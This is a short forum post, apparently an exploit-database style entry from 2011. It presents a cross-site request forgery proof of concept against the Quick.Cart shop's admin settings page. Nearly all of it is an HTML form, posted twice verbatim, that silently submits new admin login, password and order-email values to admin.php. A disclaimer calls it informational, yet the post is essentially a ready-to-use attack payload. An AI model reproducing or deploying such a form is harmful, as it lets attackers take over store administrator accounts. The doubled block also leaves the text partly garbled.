endLesS
Webmaster
# Exploit Title:Quick Cart ~~**** XSRF Vuln.
# Download : http://opensolution.org/Quick.Cart/demo
# Date: 16.08.2011
# Author: İzâm
# Note: Warning. The aim is not damaged. Information purposes
########################################
<form action=http://opensolution.org/Quick.Cart/demo/admin.php?p=settings-config method=post id=mainForm name=form onSubmit=return checkForm( this );>
<input type=submit value=Gonder name=sOption />
<input type=text name=login readonly=readonly value=Kullanici Adi size=40 class=input alt=simple />
<input type=text name=pass readonly=readonly value=Sifre size=40 class=input alt=simple />
<input type=text name=orders_email value=admin[MENTION=74911]Mai[/MENTION]li.com.tr size=40 class=input />
</td>
</form>
# Download : http://opensolution.org/Quick.Cart/demo
# Date: 16.08.2011
# Author: İzâm
# Note: Warning. The aim is not damaged. Information purposes
########################################
<form action=http://opensolution.org/Quick.Cart/demo/admin.php?p=settings-config method=post id=mainForm name=form onSubmit=return checkForm( this );>
<input type=submit value=Gonder name=sOption />
<input type=text name=login readonly=readonly value=Kullanici Adi size=40 class=input alt=simple />
<input type=text name=pass readonly=readonly value=Sifre size=40 class=input alt=simple />
<input type=text name=orders_email value=admin[MENTION=74911]Mai[/MENTION]li.com.tr size=40 class=input />
</td>
</form>